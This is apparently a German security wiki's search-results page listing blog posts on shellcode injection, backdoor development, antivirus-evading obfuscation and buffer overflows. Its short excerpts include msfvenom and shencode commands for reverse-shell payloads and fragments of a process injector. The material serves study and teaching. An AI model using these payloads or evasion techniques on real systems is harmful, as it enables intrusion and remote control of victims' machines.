NoSociety.de

#nosoc

  • Seiten-Werkzeuge
    Seite anzeigenÄltere VersionenLinks hierher
  • Webseiten-Werkzeuge
    Letzte ÄnderungenMedien-ManagerÜbersicht
  • Benutzer-Werkzeuge
    Anmelden

Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Beginnt mit
  • Genaue Treffer
  • Beginnt mit
  • Endet mit
  • Enthält
@it-security
  • Alle Namensräume
  • it-security:blog (13)
Jederzeit
  • Jederzeit
  • Letzte Woche
  • Letzter Monat
  • letztes Jahr
Sortiere nach Treffer
  • Sortiere nach Treffer
  • Sortiere nach letzter Änderung

Passende Seitennamen:

  • Backdoor development with Code Caves
  • Obfuscation: polymorpher In-Memory Decoder
  • Obfuscation: Shellcode als UUIDs tarnen
  • obfuscation_shellcode_als_uuids_tarnen_-_teil_1
  • Shellcode Injection Teil 1
  • Shellcode Injection Teil 2
  • Shellcode Injection Teil 3
  • Shellcode Injection Teil 4

Volltextergebnisse:

Shellcode Injection Teil 4 @it-security:blog
47 Treffer, Zuletzt geändert: vor 10 Monaten
''calc.exe'' auf einem Windows Rechner * 64-Bit Code * Vermeiden von Null-Bytes ===== Vorbereitunge... st von [[https://www.ired.team/offensive-security/code-injection-process-injection/finding-kernel32-base... ich für den Aufbau des Shellcodes genutzt. ===== Code: Schritt für Schritt ===== Den kompletten Code findet ihr auch auf [[https://github.com/psycore8/nosoc
Obfuscation: polymorpher In-Memory Decoder @it-security:blog
46 Treffer, Zuletzt geändert: vor 9 Monaten
sten. Der Decoder startet mit dieser Anweisung: <code asm> _start: jmp short call_decoder ; Begin of JMP-CALL-POP </code> ''%%JMP-CALL-POP%%'' ist eine Technik, welche uns erlaubt Code unabhängig vom Speicher auszuführen. In diesem er... en wir nun zur Sprungmarke ''%%call_decoder%%'' <code asm> call_decoder: call decoder ; RSP
Buffer Overflow im 64-Bit Stack - Teil 3 @it-security:blog
39 Treffer, Zuletzt geändert: vor 4 Monaten
der Funktion einen Systembefehl absetzen können <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Abhängigkeiten ===== * socat mod ... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
Buffer Overflow im 64-Bit Stack - Teil 1 @it-security:blog
36 Treffer, Zuletzt geändert: vor 11 Monaten
langen.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== ASLR deaktivieren ==== ASLR muss dea... mit Speicherbereiche nicht randomisiert werden. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
Backdoor development with Code Caves @it-security:blog
35 Treffer, Zuletzt geändert: vor 5 Monaten
utsch english}} ====== Backdoor development with Code Caves ====== {{:it-security:blog:bd-putty-header... xe%%'' that is unused in the resources (so-called code caves). ===== 1.0 Introduction ===== The following steps will be executed: * Identify the code cave * Change the access rights of the resource... Identify and hijack the function * Redirect the code flow * Test the backdoor ===== 2.0 Code Caves
Hilfreiche NMAP Scanner Kommandos
32 Treffer, Zuletzt geändert: vor 11 Monaten
=== Command Set ===== ==== Discover Hosts ==== <code bash> export IPRANGE='172.16.0.0/16' nmap -e tun0 -sn -v -oA pingscan $IPRANGE </code> ==== Parse Results ==== <code bash> grep Up pingscan.gnmap | awk '{print$2}' > 172_16_ping_ips.txt </code> ==== Discover Services ==== <code bash> nmap -
Shellcode Injection Teil 1 @it-security:blog
30 Treffer, Zuletzt geändert: vor 10 Monaten
| > shell.c | Speichere in die Datei shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST... ta_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c </code> \\ \\ ===== C++ Injector ===== Wir erstellen un... = 540; int main(int argc, char** argv) { char* code; printf("#nosoc - expecttheunexpected"); code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_E
Obfuscation: ByteSwapping @it-security:blog
29 Treffer, Zuletzt geändert: vor 7 Monaten
%%''|''%%F9%%''|''%%12%%''|''%%D1%%''| ===== Der Code ===== ==== Schritt 1: Python Encoder ==== Die e... hinzu * Gib das Bytearray als Ergebnis zurück <code python> def encrypt(data: bytes, xor_key: int... e = enc_byte return bytes(transformed) </code> ==== Schritt 2: Assembly ==== Nun muss das Ass... lüsselung wieder Rückgängig macht. Den kompletten Code findet Ihr am Ende des Beitrags. === Schritt 2.1
Shellcode Injection Teil 3 @it-security:blog
24 Treffer, Zuletzt geändert: vor 12 Monaten
h kann es unter manchen Umständen nötig sein, den Code für die Shell erst im zweiten Schritt zu laden. ... u laden und anschließend auszuführen. \\ \\ ===== Code ===== ==== C++ Programm ==== Als erstes brauche... lädt und anschließend in diesen hineinspringt. <code cpp> ... //buf ist der Shellcode unsigned char bu... rthin __asm { mov eax, target jmp eax } } </code> Den kompletten Code findet Ihr im [[https://git
Group Managed Service Accounts
22 Treffer, Zuletzt geändert: vor 17 Monaten
bereitungen ===== Root Key auf dem DC anlegen: <code powershell> Add-KdsRootKey -EffectiveImmediately </code> Anschließend 10 Stunden warten, um sicherzustel... MSA-Konto ===== ==== anlegen ==== Auf dem DC: <code powershell> New-ADServiceAccount -Name <ACCOUNTNA... llowedToRetrieveManagedPassword <COMPUTERNAME>$ </code> ==== testen ==== Auf dem Zielsystem: <code po
Buffer Overflow im 64-Bit Stack - Teil 2 @it-security:blog
22 Treffer, Zuletzt geändert: vor 11 Monaten
568|kompilierte Binary]] aus dem Blog debuggen. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Abhängigkeiten ===== Was wird benöt... erflow_x64|Teil 1]], benötigen wir noch ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== ASLR deaktivieren ===== Auch hier muss ASLR wieder d
Shellcode Injection Teil 2 @it-security:blog
21 Treffer, Zuletzt geändert: vor 10 Monaten
e|Github Repository]] herunterladen. \\ \\ ===== Code ===== ==== Erläuterung ==== Unser Code soll die PID des Zielprozesses als Parameter beim Start überge... %'', mit dem Rückgabewert des Programm-Handles. <code cpp> processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1]))); </code> Nun reservieren wir einen Speicherbereich für u
Obfuscation: Shellcode als UUIDs tarnen @it-security:blog
18 Treffer, Zuletzt geändert: vor 10 Monaten
rd in der Regel durch Windows Defender erkannt. <code bash> python shencode.py create -c="-p windows/x6... T=IPADDRESS LPORT=PORT -f raw -o shell_rev.raw" </code> ==== encoden ==== Dieses Payload encoden wir nun als UUID-Strings. <code bash> python shencode.py encode -f shell_rev.raw -u </code> Die Ausgabe sieht nun in etwas so aus: <code c
Host Discovery mit Metasploit Datenbank
16 Treffer, Zuletzt geändert: vor 10 Monaten
utzer mit Zugriffsrechten für diese einrichten. <code bash> root@kali:~# msfdb init Creating database u... g/database.yml Creating initial database schema </code> ===== Metasploit: Datenbank verbinden ===== <code ruby> msf6 > db_connect user:pass@127.0.0.1/db_name </code> ==== Verbindung prüfen ==== <code ruby> msf6 >
SMB Hardening
14 Treffer, Zuletzt geändert: vor 18 Monaten
ch) kann der Status wie folgt abgefragt werden: <code powershell>Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</code> SMBv1 deaktiveren geht ebenfalls über die Powershell (Neustart erforderlich): <code powershell>Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</code> === Server === Für Server gelten die gleichen
FatCat Attack PoC @it-security:blog
14 Treffer, Zuletzt geändert: vor 15 Monaten
Privilegien-Eskalation: Windows-Admin dank Linux @it-security:blog
12 Treffer, Zuletzt geändert: vor 15 Monaten
nmap SMBv1 Scan via Script
6 Treffer, Zuletzt geändert: vor 18 Monaten
64-Bit Stack CheatSheet
4 Treffer, Zuletzt geändert: vor 10 Monaten
Sichere Passwörter
4 Treffer, Zuletzt geändert: vor 18 Monaten
OSI Layer Cyber-Attacken
3 Treffer, Zuletzt geändert: vor 17 Monaten
Buffer Overflows - Intro
2 Treffer, Zuletzt geändert: vor 11 Monaten